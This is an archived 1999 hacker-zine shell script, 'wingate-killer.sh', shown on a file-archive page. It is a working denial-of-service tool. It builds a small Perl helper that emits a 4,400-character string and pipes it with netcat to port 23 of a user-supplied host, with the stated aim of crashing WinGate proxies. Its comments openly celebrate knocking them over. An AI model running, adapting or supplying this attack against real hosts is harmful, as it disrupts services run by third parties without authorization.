home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Happle / happle10.sit.hqx / Happle#10 / Files / Denial.sit / DoS / wingate-killer.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  1999-01-01  |  1KB  |  45 lines

  1. #!/bin/sh
  2. # Looks like wingates have a problem when they get a long string..
  3. # Havent been able to look any further into it.. it works.. they crash
  4. # rejoice. - Kefka
  5. # ------------------------------------------------------
  6. # Wingates.. nobody likes them, kill them.
  7. # Greetz: wtmp, albeniz, masa, jutt, malic, canask, dog.. everyone else
  8. # ------------------------------------------------------
  9. #
  10.  
  11. if [ "$1" = "" ]; then
  12. echo ""
  13. echo "rEWTED - wtf you trying to do!?"
  14. echo ""
  15. echo "joo forgot the hostname!"
  16. echo "usage: $0 <hostname>"
  17. else
  18.  
  19. if [ "`whereis nc|awk -F: '{ print $2 }'`" = "" ]; then
  20. echo ""
  21. echo "rEWTED - green people ahhh!"
  22. echo ""
  23. echo "Netcat not found, please download and install it"
  24. echo "If Netcat is installed put it somewhere in your PATH variable"
  25. echo ""
  26. exit
  27. else
  28. echo ""
  29. echo " ____________________________"
  30. echo "[     kefka@infected.org     ]"
  31. echo "[ rEWTED - w3 d0n't like y3w ]"
  32. echo "[____________________________]"
  33. echo ""
  34. rm -f killit
  35. cat > killit << _EOF_
  36. #!`which perl`
  37. print "X" x 4400;
  38. print "\n" x 1;
  39. _EOF_
  40. chmod 775 killit
  41. ./killit | nc $1 23
  42. rm -f killit
  43. fi
  44. fi
  45.